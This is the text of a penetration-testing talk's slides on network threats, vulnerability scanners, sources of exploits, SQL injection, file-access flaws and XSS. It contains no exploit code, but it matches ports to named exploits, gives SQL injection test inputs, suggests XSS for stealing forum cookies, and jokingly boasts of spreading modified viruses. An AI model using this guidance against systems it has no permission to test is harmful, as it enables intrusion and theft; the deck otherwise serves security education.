Sembang2 Sembang2 Keselamatan ItKeselamatan It

Sembang2 Sembang2 Keselamatan ItKeselamatan It

sk@scan-associates.netsk@scan-associates.net

SpeaKer• Call me S.K.• While in UTM:

– Modify virus source code and spread it to Tar College, crack Virus Buster™ for fun

• After UTM:– Start up SCAN Associates– Legally do pen-test for many agencies– Document hacking tricks and share

with friends

Advertisement

Publications• SQL Injection Walkthrough, published in

more than a dozen security web site• Win32 Buffer Overflow Walkthrough,

details the process of buffer overflow• Thanks from Microsoft™ for finding bug

in their software• Creating firewall proof shellcode in

Blackhat and soon in Ruxcon conference

• Winner of Blackhat Hacking game!

Advertisement

Wat we wanna do today?

• Appetizer has:– some new terminologies– a bit of concepts– a few easy to use tools

• Main course:– Treat– Vulnerability– Exploitation– A bit of SQL injection

• Dessert:• demo on some tricks/tools

TOC

Threat• If there is a computer, there is a

threat…• If there are 2 computers, there are

2 times threats…• If there are N computers, there are

N x threats…

• The more computers you hafta manage, the more risk there is…

Threat

Threat, seriously…

• Running background services– Services running all the time– Allow direct connection from

anywhere– Favorite targets:

• HTTP (port 80)• FTP (port 21)• NetBIOS (port 135, 445)• HTTPS (port 443)• SSH (port 22), etc

Threat

More threats…

• Mistake and Configuration errors:– No password– User name = password– Write access allowed– Default Public/Private community

string– Poor Access Control in proxy server– Testing server in public network– Existing of default account

Threat

Threats from within…

• End-user attacks:– Email attachments– User download trojan horse– File sharing tool like Kazaa– Not to mention Instant Messaging

and IRC– Unprotected Wi-Fi Access Point

Threat

Vulnerability• Software bug leads to vulnerability,

vulnerability leads to system hack• Thus, software bug is our friend• Find the bug, you will find the way in• Fortunate for us, security experts

publish new vulnerability everyday• Our objective is to find a system with

any vulnerability

Vulnerability

Finding vulnerability• The easy way:

– nessus – general purpose vuln scanner

– nikto – web attack scanner• The semi-automatic approach:

– nmap – port scanner– sl – port scanner for windoze

• The free-styler:– netcat– your favorite browser

Vulnerability

nessus• General purpose

vulnerability scanner• http://www.nessus.org• GNU Public License• Test hundreds of

vulnerabilities effortlessly

• Can write your own plug-in using NASL

• Test only, will not let you control the server

Vulnerability - The easy way

nessus client-server

Nessus Client(Unix)

Nessus Server(Unix)

Targets

Nessus Client (Windows)

Targets

Vulnerability - The easy way

nikto• Web scanner• http://www.cirt.net/code/

nikto.shtml• Open source (GPL)• Over 2600 vulnerabilities

specific to Web only• Support HTTPS

connection to avoid IDS detection

• Test only, will not let you control the server

Vulnerability - The easy way

Other Tools• General purpose scanner

– Internet Security Scanner (www.iss.net)

– Eeye’s Retina (www.eeye.com)• Web Server Scanner

– Stealth HTTP Scan (www.hideaway.net)

– Whisker (www.wiretrip.net/rfp/p/doc.asp/i2/d21.htm)

Vulnerability - The easy way

Port Scanner • Tell you what type of services are

running in a server• Indirectly tell you the OS too• nmap

– www.insecure.org/nmap/– Versatile port scanner for *nix

• sl– www.foundstone.com– easy to use port scanner for windoze

Vulnerability - semi-automatic

Favorite targets• Port 53 – try bind exploit• Port 21 – try anonymous login, simple passwd

or exploits for Pro-Ftp, Wu-ftp, serv-u, etc• Port 22 – try simple passwd and x2 exploit• Port 25 – sendmail exploit for slackware or

exchange exploit• Port 80 – Apache chunked bug, IIS .printer,

unicode, ASP chunked, Webdav, Frontpage, etc.• Port 135, 445 – try netbios sharing with simple

passwd or Locator, Dcom, messenger, workstation, Lsass exploits

• Port 443 – SSL-too-open, THCISSLame.c• Port 1433, 1434 – MS Sql Server Resolution

Bug, HelloBug or SA without password

Vulnerability - semi-automatic

Free styler• Using netcat to connect to popular

services and backdoor port:– port 22 review SSH version– port 1080 might allow you to connect to

internal IP– port 5554 might drop you a shell

• Use your favorite browser to surf around the target web server, look for:– Hidden info in HTML code– Web attack via SQL injection, PHP, Perl, etc

Vulnerability

Exploitation• The process of taking advantage of a

vulnerability to either:– Get a shell (thus, control the victim)– Retrieve/modify information (source code,

files, database)– Denial of Service (DOS), etc

• To get an exploit:– Find/trade from www/irc/friends– Create it yourself– Purchase it from Core Impact or

CANVAS

Exploitation

Find from Internet• www.metasploit.com • Bugtraq Mailing list • Full Disclosure Mailing list • http://packetstormsecurity.nl/

• http://www.security.nnov.ru/search/exploits.asp

• #vuln, #badcode, #darknet, #phrack

Exploitation

Creating it yourself

• Read and understand the vulnerability from the advisory:– www.securitytracker.com– www.microsoft.com/security

• Might require different skill set in:– Perl/PHP/SQL– Reverse engineering– C or ASM programming, etc

Exploitation

metasploit• www.metasploit.com• Developed by HD Moore and a few

ghettohackers (they won Defcon Ctf 3 times in a row)

• Integrated many exploits in one easy to use package

• Support command line and web interface

• Packed with many useful component for exploit development

• Its free!

Exploitation

Web attack

• Developers are putting more functionality into Web (port 80)

• There are many type of attacks specific to port 80 alone:– SQL injection– Perl and CGI insecurities– PHP insecurities– Cross scripting (XSS)

Web attack

SQL Injection• A technique to manipulate data in a

way that it will change the original SQL statement

• It could happened in the following manner:– Program takes your input as a variable– It appends your input into an SQL

statement– The program then pass the statement

to the Database

Web attack

...SQL Injection• What if your input is an SQL command?• By carefully insert SQL command as

your input, you can change the original SQL statement to something else and make the Database to execute your command

• Usual command to test for SQL injection:– Type a single quote as input (‘)– Type “ union select 1” to see if injection is

possible

Web attack

Perl & CGI

• File access problem• User supply variable which in turn

used by Perl/CGI to open a file• Manipulating this variable may

allow you to open any file or even remote execution

Web attack

PHP

• Just like Perl/CGI, only more powerful (in a sense of hacking)

• Not only you may manipulate variable to open any file, you also can control it to open any file in the Internet

Web attack

XSS

• Allow injection of HTML code (including Javascript/VBScript) into existing HTML page

• If a user open the page, your code execute

• Best used in Forum, to steal user cookie

Web attack

Can we go now?

• Q & A Session• Thanks